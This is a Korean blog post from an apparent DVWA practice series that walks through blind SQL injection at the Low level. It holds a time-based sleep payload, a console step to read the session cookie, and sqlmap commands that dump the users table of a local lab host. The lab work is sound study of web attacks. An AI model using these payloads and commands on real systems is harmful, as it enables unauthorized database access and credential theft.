SQL Injection(Blind)

2023. 8. 18. 15:35보안/DVWA

SQL Injection(Blind)는 Low 레벨만 다뤄보려고 한다.

 

 

1' and sleep(5)#와 같이 입력하면 참인 경우 5초 후 반응한다. 단, 데이터에 id 값이 없는 경우는 바로 반응함을 알 수 있다.

연산자 and와 함수 sleep을 통해 시간으로 참 값임을 확인하는 방법

 

 

F12를 누크로 Network 탭을 확인하면 아래와 같이 전송시간을 확인할 수 있다.

5초 후 반응 하므로 id에 1이 존재한다

 

 

구체적인 데이터 값을 알기 위해 kali에서 명령어 sqlmap을 사용해보자.

쿠키값이 필요한데 F12를 누르고 console에서 alert(document.cookie)를 입력하면 쿠키정보를 얻을 수 있다.

쿠키정보 획득!

 

 

sqlmap -u "http://192.168.2.14/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=5granl2h2j7g8gje6rvod3v4c3" -D dvwa  --tables

 

와 같이 kali에서 입력하면 DB dvwa에서 table 정보를 알 수 있다.

kali에서의 입력화면


 

결과 확인

 

 

sqlmap -u "http://192.168.2.14/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=5granl2h2j7g8gje6rvod3v4c3" -D dvwa -T users --dump

 

와 같이 입력하면 테이블 users 안의 데이터 값을 알 수 있다.

결과 확인

 

'보안 > DVWA' 카테고리의 다른 글

XSS(Stored)  (0) 2023.08.18
XSS(Reflected)  (0) 2023.08.18
SQL Injection  (0) 2023.08.17
File Upload  (0) 2023.08.17
File Inclusion  (0) 2023.08.17